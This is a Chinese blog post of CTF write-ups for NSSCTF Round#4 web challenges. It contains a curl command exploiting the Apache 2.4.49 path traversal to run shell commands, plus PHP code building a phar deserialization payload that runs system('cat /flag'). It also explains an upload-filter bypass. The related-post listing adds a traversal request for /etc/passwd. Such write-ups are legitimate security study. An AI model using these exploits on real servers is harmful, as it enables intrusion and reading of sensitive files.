NSSCTF Round#4

最新推荐文章于 2024-03-05 20:24:00 发布
最新推荐文章于 2024-03-05 20:24:00 发布
阅读量368 收藏
点赞数
文章标签: java 前端 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/126139588
版权
本文讲述了通过分析源码和网络流量,发现一个利用PHP phar漏洞进行远程代码执行的过程。作者尝试了目录遍历和构建phar包,最终通过上传伪装成图片的phar文件并使用phar伪协议读取来获取flag。
摘要由CSDN通过智能技术生成

1zweb

 打开界面感觉这道题和上一个一样,有查询文件的功能,直接查询flag,签到提

ez_rce

打开界面各种看,源码啥都没有

然后抓包看一下配置, 

搜一下有,2.4.49有目录遍及的漏洞,和以前做的一道题几乎一样

远程代码执行

curl -v --data "echo;id" 'http://192.168.190.134:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'  

看见flag_is_here,以为就要成功了,可是怎么都得不到 

 

内心想的是是不是故意给出flag的文件,然后真的却不在这里面呢 

步骤没错,可是缺乏考虑,wp中说,这里制造了一个文件夹迷宫,仅存在四层

需要bp爆破,因为没环境不好构造,给出链接

NSSCTF

1zweb(revenge)

 额看到查询文件,就查一下源码

ljt="ljt"; 
$this->dky="dky"; phpinfo(); } 
public function __destruct()
          { if($this->ljt==="Misc"&&$this->dky==="Re") eval($this->cmd); } 
public function __wakeup(){ $this->ljt="Re"; $this->dky="Misc"; } }
 $file=$_POST['file']; if(isset($_POST['file']))
         { if (preg_match("/flag/i", $file)) { die("nonono"); } 

echo file_get_contents($file); }

感觉不太完整,也没反序列化,脑子里第一想的会不会是构建一个phar包,自动实现序列化这种

以上都是自己的分析,看完wp

<?php
class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    if (preg_match("/flag/i", $file)) {
      die("nonono");
    }
    echo file_get_contents($file);
}

为什么我的不是完整的呢,可能在源码完整。

   if($this->ljt==="Misc"&&$this->dky==="Re")这样那肯定,就是

lit=Misc dky=Re

  public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }这里面构建就会出现,而反序列化会在后面赋值覆盖掉

  public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }这里冲突,应该会绕过wakeup,大于属性个数,

这样看就是构造phar包

<?php
  unlink('phar.phar');
  class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
  }

  $a=new LoveNss();
  $a->cmd="system('cat /flag');";
  $a->ljt="Misc";
  $a->dky="Re";
  $phar = new Phar('phar.phar');
  $phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
  $phar->setMetadata($a);
  $phar->addFromString('1.txt','dky');
?>

然后phar访问

<?php
if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}
?>

后缀必须是图片,且内容不能出现phar标志

可以压缩zip绕过

  $phar = new Phar('phar.phar');来判断文件的名称 

上传后用phar伪协议读取,格式phar://文件上传的路径.phar.phar               自己设置的名称

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nssctf round#4
weixin_63231007的博客
08-21 1297
curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。怎么通过脚本直接修改这个phar文件里序列化好的数据来绕过wakeup这部分我不清楚,查看wp之后需要生成phar文件后,自己手动修改文件数据,用到脚本修改签名。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。
[NSSRound#4 SWPU]1zweb
m0_70819573的博客
03-13 628
index.php中只需要绕过_wakeup魔术方法就行了,可以考虑增加自然属性个数或增加属性个数来绕过,因为upload.php会检查stub,所以压缩文件成zip(注意要用winhex改变属性个数,不然签名会改变),用phar://伪协议来读取文件。得到aa.phar.gz,改文件名为1.jpg上交,用phar读取发现签名损坏,所以要进行签名修复,phar由data,data签名(20位),和签名格式(8位)组成。可以用读取文件读取index.php,upload.php的源码。
每日练习-NSSRound#4 SWPU-1zweb
m0_68113265的博客
08-21 208
upload限制了phar文件的上传。同时设置了白名单,只允许png,jpg,gif文件上传.这段代码,对前面的内容或者后缀名是没有要求的,可以直接修改为其他后缀。phar由data,data签名(20位),和签名格式(8位)组成。只要将phar文件使用 gzip 命令进行压缩,这段代码就会消失。php识别phar文件是通过其文件头的stub,更确切一点来说是。生成phar文件,同时放入010增加属性数量来绕过weak_up。接着就是修复phar签名以及压缩。上传成功之后,查询文件。
【SWPU NSS新生赛校外通道】web:奇妙的MD5、whereami、webdog1__start、ez_ez_php、ez_ez_php(revenge)
weixin_46497491的博客
10-23 1264
【SWPU NSS新生赛校外通道】web:奇妙的MD5、whereami、webdog1__start、ez_ez_php、ez_ez_php(revenge)
NSSCTF web题记录
热门推荐
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
Codeforces Round #723 (Div. 2).md
10-13
Codeforces Round #723 (Div. 2).md
Codeforces Round #479 (Div. 3) E. Cyclic Components
01-03
E. Cyclic Components 题目链接-E. Cyclic Components 题目大意 给你nnn个点和mmm条边,求所构成图中单圈环的个数 ...并查集并查集并查集 很明显单圈环每个点的度都为222,所以我们可以用数组cnt[]记录每个点的度,...
Codeforces Round #627 (Div. 3) B. Yet Another Palindrome Problem
01-03
传送门 题意: 一个长度为n的数组,为删除一些数后,剩下的数能否构成长度大于3的回文数组 思路: 只要能找到两个相等的数,且他们的间距大于2即可 o(n^2)的暴力就能过 比赛时写了一个o(n)的 就是把所有相等的数放到...
Codeforces Round #627 (Div. 3) C. Frog Jumps(思维)
01-20
传送门 题意: 开始位置在0,问能否跳到n+1位置 每步只能跳d 在1——n每个位置有方向,L,R,求d的最小值 思路: 只用找相邻两个R之间的最大值即可 代码: #include #include ...typedef long long l
Codeforces Round #628 (Div. 2)
01-03
C. Ehab and Path-etic MEXs 题意 给两两节点放一个数字(0~n-2 唯一) 给你一棵树,求所有任意两节点相连的路以外的路上的数字的最小值最小 思路 构造 若一个点连了三条边及以上,则这个点的边从最小值开始赋值。...
服务攻防演练
qq_29948489的博客
09-10 103
这是CVE-202141773的二版,在上次修复漏洞时,没有严格过滤,导致出现的二次CVE。中间件-Apache-RCE&目录遍历&文件解析等。中间件-Tomcat-弱口令&文件上传&文件包含等。bp抓包,get发送payload,证明存在漏洞。中间件-Nginx-文件解析&命令执行等。中间件-IIS-短文件&解析&蓝屏等。启动服务,以前都操作过,不在细讲。
PHP实现文件的上传
chuiyuan9786的博客
06-16 211
/////////PHP 实现文件的上传 <?php $allowedExts=array('gif','jpeg','jpg','png'); $temp=explode(".", $_FILES['file']['name']); $extension=end($te...
【CTF】青少年CTF擂台挑战赛 2024 #Round 1 部分WriteUp
最新发布
ranfeyyou的博客
03-05 1145
简单的数学题 追光者 PHP的后门 的WP
文件上传与Phar反序列化的摩擦
Aiwin的博客
11-03 2106
文件上传与Phar反序列化的摩擦和例题
[NSSRound#4] 复现
qq_61768489的博客
08-12 1231
可以看到下面的句子跟原棋盘数量一样,也就是我们要给原棋盘涂色,玩完之后能组成下面的句子并且颜色相符。是无法被正常解析的,所以需要修改签名,让他变成一个正常的phar文件还需要对phar文件进行修改。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。将文件压缩为zip文件,并把后缀改为png文件,这样文件内容和后缀白名单检测都绕过了。这里对文件后后缀进行了白名单,也对phar文件内容进行了检测,伪了绕过这两点。zip打不开,是把zip文件头换成rar了,换回去。.....
[NSSRound#4 SWPU]hide_and_seek-复现
liaochonxiang的博客
05-29 182
可以发现下表为0,1,7,8,14,15的位置可能进行了加密,一般猜测为异或。所以我们可以改一下这里的标志寄存器,或者直接nop掉,或者取反。后面一个异或:\x17^未知数=S,未知数=68。在这里下断点,可以看见它会跳到直接结束的地方。记住光标要点击内存处,因为它解密后放到内存里了。前面一个异或:Q^未知数=N,未知数= 31。可以浅显的猜测flag目前加密后的样子为。修改完成后,可以直接运行到快结束的时候。前面不是说这是一个反调试的题目吗。可以仔细观察下面的函数。这是一个反调试的题目。
CVE-2021-41773&&CVE-2021-42013复现
weixin_42345596的博客
10-09 4852
CVE-2021-41773 漏洞原理 Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响: 版本等于2.4.49 <Directory />Require all granted</Directory>(默认情况下是允许被访问的)。 攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在
CVE-2021-42013:Apache HTTP Server目录遍历漏洞
weixin_47179815的博客
07-13 2812
该漏洞是由于在Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。Apache HTTP Server 2.4.50 Apache HTTP Server 2.4.49查询地址:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
weixin_47311099的博客
12-07 2325
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013) Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.49
codeforces round #729
03-16
Codeforces Round #729 是 Codeforces 的一个比赛,于2021年8月29日举行。这是一个由 Codeforces 组织的在线编程竞赛,参赛者需要在规定时间内解决一系列算法问题。比赛难度分为 A、B、C、D、E、F 六个等级,参赛者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值